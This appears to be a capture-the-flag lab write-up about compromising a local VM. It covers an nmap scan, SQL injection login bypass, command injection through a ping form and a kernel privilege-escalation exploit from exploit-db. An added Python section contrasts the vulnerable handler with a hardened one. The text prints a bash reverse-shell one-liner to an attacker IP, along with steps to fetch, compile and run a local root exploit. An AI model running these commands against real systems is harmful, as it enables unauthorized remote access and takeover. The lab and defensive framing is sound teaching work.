# Nmap 7.80 scan initiated Thu May 7 09:13:13 2020 as: nmap -sC -sV -oA nmap/Level2 192.168.43.215
Nmap scan report for 192.168.43.215
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-05-07T10:04:36+00:00; -3h09m24s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:52:3C:FB (VMware)
Host script results:
|_clock-skew: -3h09m24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 7 09:14:28 2020 -- 1 IP address (1 host up) scanned in 75.51 seconds
SQL Injection
I saw that TCP port 80 is open, so let's open the address in the web browser.
I saw a login form, and since MySQL is running on the machine, I used SQL injection.
Then we got a box to ping a machine; let's use our own machine's IP to test it out.
Reverse Shell
This means we can enter a reverse shell command in the box to get a shell from the machine. First we need to start a netcat listener on port 443.
Then we can go to pentestmonkey to get the bash reverse shell one-liner and put it in the box:
;bash -i >& /dev/tcp/192.168.43.182/443 0>&1
After running it, we get a shell over the reverse TCP connection. First we will try using a kernel exploit.
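As an added example (not from the original writeup), here is the shape of the bug behind the ping box and a hardened handler: the vulnerable version hands the submitted address to a shell, so the ";bash ..." suffix above becomes a second command, while the hardened version accepts only an IP literal and builds an argv for ping with no shell involved. Function names and the form input values are my own assumptions.

```python
import ipaddress
import shlex
from typing import List, Optional


def ping_command_vulnerable(target: str) -> str:
    """The vulnerable pattern: concatenate form input into a shell command line.

    Anything the shell treats as a separator (';', '&&', '|', newlines) in
    `target` is executed as a second command. Returned as a string only so
    the example stays offline; a real handler would pass this to a shell.
    """
    return "ping -c 3 " + target


def shell_words(cmdline: str) -> List[str]:
    """Show how a shell tokenizes a command line (useful when reviewing logs)."""
    return shlex.split(cmdline)


def parse_target(target: str) -> Optional[ipaddress._BaseAddress]:
    """Accept only a bare IPv4/IPv6 literal; any other input is rejected."""
    try:
        return ipaddress.ip_address(target.strip())
    except ValueError:
        return None


def ping_argv_hardened(target: str) -> Optional[List[str]]:
    """Hardened pattern: validate first, then build an argument list.

    Passing this list to subprocess.run(argv) (no shell=True) means the
    address is always a single argument to ping, never shell syntax.
    None means the request should be refused and logged.
    """
    addr = parse_target(target)
    if addr is None:
        return None
    return ["ping", "-c", "3", str(addr)]


if __name__ == "__main__":
    # Constructed inputs: a plain address and the injected value from the writeup.
    for submitted in ("192.168.43.182", ";bash -i >& /dev/tcp/192.168.43.182/443 0>&1"):
        print("vulnerable:", ping_command_vulnerable(submitted))
        print("hardened:  ", ping_argv_hardened(submitted))
```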
Privilege Escalation
After some searching on Google, we got the exploit from exploit-db.
We first download the exploit to our machine, then serve it with Python using python -m SimpleHTTPServer.
On the victim, we navigate to /tmp and transfer the file over from our machine.
After that, rename the file from 9542 to 9542.c so it has the .c extension. Then compile the exploit with gcc 9542.c -o exploit. We then chmod +x exploit and run it by typing ./exploit.